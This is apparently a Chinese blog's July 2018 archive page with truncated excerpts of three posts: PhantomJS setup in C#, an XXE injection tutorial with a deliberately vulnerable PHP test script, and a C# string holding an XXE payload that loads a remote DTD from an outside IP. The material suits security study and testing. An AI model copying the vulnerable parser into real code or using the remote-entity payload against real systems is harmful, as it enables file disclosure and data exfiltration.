07 2018 档案
摘要:c#代码调用类似如下 private static PhantomJSDriverService GetPhantomJSDriverService() { PhantomJSDriverService service = PhantomJSDriverService.CreateDefaultSe
阅读全文
摘要:XML实体注入漏洞 XML实体注入漏洞 测试代码1:新建xmlget.php,复制下面代码 1 2 3 4 5 <?php $xml=$_GET['xml']; $data = simplexml_load_string($xml); print_r($data); ?> 漏洞测试利用方式1:有回显
阅读全文
摘要:string xml2 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\" ?><!DOCTYPE root [<!ENTITY % remote SYSTEM \"http://182.84.222.228:89/eval.x
阅读全文